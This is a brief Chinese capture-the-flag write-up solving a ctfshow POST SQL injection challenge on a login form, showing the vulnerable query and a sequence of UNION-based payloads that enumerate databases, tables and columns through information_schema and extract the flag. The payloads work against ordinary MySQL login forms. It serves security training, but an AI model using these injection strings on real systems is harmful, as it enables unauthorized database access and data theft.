这下变成POST注入了,还是双参数。
抓个包看看先:
注入点应该是admin。
查看一下本地环境中,这题的源码。
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
闭合是单引号'
。位数是2
.
爆库: ctfshow
uname=xxx' and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata--+&passwd=123456&submit=Submit
爆表: flagugsd
uname=xxx' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='ctfshow'--+&passwd=123456&submit=Submit
爆列: flag43s
uname=xxx' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flagugsd'--+&passwd=123456&submit=Submit
获取字段值(flag):
ctfshow{d7bf0480-8156-479b-9f97-4fbeb89233db}
uname=xxx' and 1=2 union select 1,group_concat(flag43s) from ctfshow.flagugsd--+&passwd=123456&submit=Submit